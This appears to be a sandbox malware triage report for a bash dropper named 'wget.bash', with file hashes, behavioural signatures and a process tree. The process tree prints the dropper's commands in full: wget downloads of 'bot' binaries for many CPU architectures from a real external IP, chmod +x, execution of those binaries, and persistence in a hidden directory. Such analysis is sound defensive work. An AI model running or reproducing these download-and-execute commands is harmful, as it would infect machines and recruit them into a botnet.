2db0ba4efda0653533e32abca1417cafb84f58322dc8d4df183e64771626b826 | Triage

Resubmissions

09-08-2022 18:31

220809-w6eersgaa2 5

09-08-2022 18:18

220809-wxyr2sfgg7 5

Analysis

max time kernel
0s
max time network
668s
platform
linux_amd64
resource
ubuntu1804-amd64-en-20211208
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-en-20211208kernel:4.15.0-161-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
09-08-2022 18:31

Sharing

Report Analysis Logs

General

Target

wget.bash
Size

2KB
MD5

9486bdff70b6ec6243b012a91e90c21e
SHA1

2364e70ee0d49e4e641fa7428958f5907a8c26a3
SHA256

2db0ba4efda0653533e32abca1417cafb84f58322dc8d4df183e64771626b826
SHA512

e64e2324c403d967d3d04140bb0eba159e57b83db09fdd50e882a8edc595211837505c86c1d44a65d11b9c3a34c0d02496b3c06f264e1175e248397e9716b4bd

Score

5^/10

Malware Config

Signatures

Reads runtime system information 3 IoCs
Reads data from /proc virtual filesystem.

Processes:

mkdirmv

description ioc

/proc/642/exe /proc/642/exe
/proc/filesystems /proc/filesystems mkdir
/proc/filesystems /proc/filesystems mv
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.

Processes:

wget.bash

description ioc process

/tmp/wget.bash /tmp/wget.bash wget.bash

/tmp/wget.bash
/tmp/wget.bash
1⤵
- Writes file to tmp directory
PID:571

/usr/bin/wget
wget http://109.206.241.211/bins/bot.mips
2⤵
PID:572

/bin/cat
cat bot.mips
2⤵
PID:574

/bin/chmod
chmod +x bot.mips fuwwyowo systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-resolved.service-B6MxME systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-timesyncd.service-1Gwp5Y wget.bash
2⤵
PID:575

./fuwwyowo
./fuwwyowo ssh
2⤵
PID:576

/usr/bin/wget
wget http://109.206.241.211/bins/bot.mpsl
2⤵
PID:578

/bin/cat
cat bot.mpsl
2⤵
PID:580

/bin/chmod
chmod +x bot.mips bot.mpsl fuwwyowo systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-resolved.service-B6MxME systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-timesyncd.service-1Gwp5Y wget.bash
2⤵
PID:581

./fuwwyowo
./fuwwyowo ssh
2⤵
PID:582

/usr/bin/wget
wget http://109.206.241.211/bins/bot.arm
2⤵
PID:584

/bin/cat
cat bot.arm
2⤵
PID:590

/bin/chmod
chmod +x bot.arm bot.mips bot.mpsl fuwwyowo systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-resolved.service-B6MxME systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-timesyncd.service-1Gwp5Y wget.bash
2⤵
PID:591

./fuwwyowo
./fuwwyowo ssh
2⤵
PID:592

/usr/bin/wget
wget http://109.206.241.211/bins/bot.arm5
2⤵
PID:594

/bin/cat
cat bot.arm5
2⤵
PID:596

/bin/chmod
chmod +x bot.arm bot.arm5 bot.mips bot.mpsl fuwwyowo systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-resolved.service-B6MxME systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-timesyncd.service-1Gwp5Y wget.bash
2⤵
PID:597

./fuwwyowo
./fuwwyowo ssh
2⤵
PID:598

/usr/bin/wget
wget http://109.206.241.211/bins/bot.arm6
2⤵
PID:600

/bin/cat
cat bot.arm6
2⤵
PID:602

/bin/chmod
chmod +x bot.arm bot.arm5 bot.arm6 bot.mips bot.mpsl fuwwyowo systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-resolved.service-B6MxME systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-timesyncd.service-1Gwp5Y wget.bash
2⤵
PID:603

./fuwwyowo
./fuwwyowo ssh
2⤵
PID:604

/usr/bin/wget
wget http://109.206.241.211/bins/bot.arm7
2⤵
PID:606

/bin/cat
cat bot.arm7
2⤵
PID:608

/bin/chmod
chmod +x bot.arm bot.arm5 bot.arm6 bot.arm7 bot.mips bot.mpsl fuwwyowo systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-resolved.service-B6MxME systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-timesyncd.service-1Gwp5Y wget.bash
2⤵
PID:609

./fuwwyowo
./fuwwyowo ssh
2⤵
PID:610

/usr/bin/wget
wget http://109.206.241.211/bins/bot.ppc
2⤵
PID:612

/bin/cat
cat bot.ppc
2⤵
PID:614

/bin/chmod
chmod +x bot.arm bot.arm5 bot.arm6 bot.arm7 bot.mips bot.mpsl bot.ppc fuwwyowo systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-resolved.service-B6MxME systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-timesyncd.service-1Gwp5Y wget.bash
2⤵
PID:615

./fuwwyowo
./fuwwyowo ssh
2⤵
PID:616

/usr/bin/wget
wget http://109.206.241.211/bins/bot.m68k
2⤵
PID:618

/bin/cat
cat bot bot.m68k
2⤵
PID:620

/bin/chmod
chmod +x bot.arm bot.arm5 bot.arm6 bot.arm7 bot.m68k bot.mips bot.mpsl bot.ppc fuwwyowo systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-resolved.service-B6MxME systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-timesyncd.service-1Gwp5Y wget.bash
2⤵
PID:621

./fuwwyowo
./fuwwyowo ssh
2⤵
PID:622

/usr/bin/wget
wget http://109.206.241.211/bins/bot.sh4
2⤵
PID:624

/bin/cat
cat bot.sh4
2⤵
PID:626

/bin/chmod
chmod +x bot.arm bot.arm5 bot.arm6 bot.arm7 bot.m68k bot.mips bot.mpsl bot.ppc bot.sh4 fuwwyowo systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-resolved.service-B6MxME systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-timesyncd.service-1Gwp5Y wget.bash
2⤵
PID:627

./fuwwyowo
./fuwwyowo ssh
2⤵
PID:628

/usr/bin/wget
wget http://109.206.241.211/bins/bot.spc
2⤵
PID:630

/bin/cat
cat bot.spc
2⤵
PID:632

/bin/chmod
chmod +x bot.arm bot.arm5 bot.arm6 bot.arm7 bot.m68k bot.mips bot.mpsl bot.ppc bot.sh4 bot.spc fuwwyowo systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-resolved.service-B6MxME systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-timesyncd.service-1Gwp5Y wget.bash
2⤵
PID:633

./fuwwyowo
./fuwwyowo ssh
2⤵
PID:634

/usr/bin/wget
wget http://109.206.241.211/bins/bot.x86_64
2⤵
PID:636

/bin/cat
cat bot.x86_64
2⤵
PID:638

/bin/chmod
chmod +x bot.arm bot.arm5 bot.arm6 bot.arm7 bot.m68k bot.mips bot.mpsl bot.ppc bot.sh4 bot.spc bot.x86_64 fuwwyowo systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-resolved.service-B6MxME systemd-private-496b361196844d2b906d7a1389c0a1f4-systemd-timesyncd.service-1Gwp5Y wget.bash
2⤵
PID:639

./fuwwyowo
./fuwwyowo ssh
2⤵
PID:640

/bin/sh
sh -c "mkdir /wlg76dsvkr/ && >/wlg76dsvkr/wlg76dsvkr && cd /wlg76dsvkr/ >/dev/null"
1⤵
PID:643

/bin/mkdir
mkdir /wlg76dsvkr/
2⤵
- Reads runtime system information
PID:644

/bin/sh
sh -c "mv /tmp/fuwwyowo /wlg76dsvkr/wlg76dsvkr && chmod 777 /wlg76dsvkr/wlg76dsvkr >/dev/null"
1⤵
PID:645

/bin/mv
mv /tmp/fuwwyowo /wlg76dsvkr/wlg76dsvkr
2⤵
- Reads runtime system information
PID:646

/bin/chmod
chmod 777 /wlg76dsvkr/wlg76dsvkr
2⤵
PID:647

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads